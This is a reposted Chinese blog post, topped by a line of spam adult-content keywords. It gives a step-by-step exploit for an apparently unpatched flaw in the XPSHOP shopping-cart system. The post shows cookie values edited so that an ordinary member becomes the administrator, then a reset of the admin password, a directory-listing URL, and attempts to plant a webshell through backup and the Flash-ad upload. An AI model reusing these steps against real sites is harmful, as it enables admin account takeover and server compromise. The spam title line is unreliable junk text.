韩国大尺度床戏激情戏裸戏电影_麻豆免费播放_激情引诱h文_久久www视频

[重要通告]如您遇疑難雜癥,本站支持知識付費業務,掃右邊二維碼加博主微信,可節省您寶貴時間哦!

XPSHOP商城系統漏洞 本文轉載老康BLOG
無意中發現這個漏洞的..官方現在還不知道...我沒有在別處公布哦..
這個漏洞不好...要直拉改人家管理員密碼!!有點兒缺德!!!...
但為了我們的網絡更安全..還是看看吧...

首先先看看這個站吧:http://demo1.xpshop.cn/
先注冊一個用戶進去..為了方便也為了不要那么垃圾賬戶在人家系統里.我這說一下我注冊好了的用戶名:wc1217 密碼:77423704

好..還是用啊D打開網站比較好..記得要保留cookies

之后便看看他的Cookies...

代碼:

LoginCode=0684; demo1.xpshop.cnResource=zh-cn; ASP.NET_SessionId=3pxjo23zuikyrk45mx0g4a55; XpShop_CartID=0f810c00-fbbf-4984-951e-555357b14a54; demo1.xpshop.cnLogin=mid=14
我們改一下這兩個值:LoginCode=0684;mid=14 .......都改成1 :

代碼:

LoginCode=1; demo1.xpshop.cnResource=zh-cn; ASP.NET_SessionId=3pxjo23zuikyrk45mx0g4a55; XpShop_CartID=0f810c00-fbbf-4984-951e-555357b14a54; demo1.xpshop.cnLogin=mid=1點擊修改..后右鍵刷新看一下..要注意.不要刷得太快...不然就沒用了..

之后就OK了:

當然..也有可能沒有..那我們就要改一下:"ASP.NET_SessionId=" 這個值就好了..隨便改一個字就行:如下:

代碼:

LoginCode=1; demo1.xpshop.cnResource=zh-cn; ASP.NET_SessionId=fu1q1w3g3qc2vn55naohei55; XpShop_CartID=0f810c00-fbbf-4984-951e-555357b14a54; demo1.xpshop.cnLogin=mid=1好了..現在再看看會員信息:
是不是有一個"找回密碼答案:"呵.....個位都想到了吧..直接就能改管理員密碼了..
http://demo1.xpshop.cn/memberLostpass.aspx這個是改密碼的..

成功.....http://demo1.xpshop.cn/admin/default.aspx這里登錄后就是怎么拿WEBSHELL了..
可是我一直沒弄成..理論是只有這樣才行..看..

先插馬..再備份..但這里出錯了..
還望達人能想出更好的辦法..
我想了一晚上了....沒轍了....
http://demo1.xpshop.cn/admin/ftb.imagegallery.aspx?frame=1&rif=admin&cif=admin 這可以列目錄

好..就那么多了

http://demo1.xpshop.cn/helps/t.txt

添加flash廣告處可直接上傳馬

營銷管理 - flash廣告添加

問題未解決?付費解決問題加Q或微信 2589053300 (即Q號又微信號)右上方掃一掃可加博主微信

所寫所說,是心之所感,思之所悟,行之所得;文當無敷衍,落筆求簡潔。 以所舍,求所獲;有所依,方所成!

支付寶贊助
微信贊助

免責聲明,若由于商用引起版權糾紛,一切責任均由使用者承擔。

您必須遵守我們的協議,如您下載該資源,行為將被視為對《免責聲明》全部內容的認可->聯系老梁投訴資源
LaoLiang.Net部分資源來自互聯網收集,僅供用于學習和交流,請勿用于商業用途。如有侵權、不妥之處,請聯系站長并出示版權證明以便刪除。 敬請諒解! 侵權刪帖/違法舉報/投稿等事物聯系郵箱:service@laoliang.net
意在交流學習,歡迎贊賞評論,如有謬誤,請聯系指正;轉載請注明出處: » XPSHOP商城系統漏洞

發表回復

本站承接,網站推廣(SEM,SEO);軟件安裝與調試;服務器或網絡推薦及配置;APP開發與維護;網站開發修改及維護; 各財務軟件安裝調試及注冊服務(金蝶,用友,管家婆,速達,星宇等);同時也有客戶管理系統,人力資源,超市POS,醫藥管理等;

立即查看 了解詳情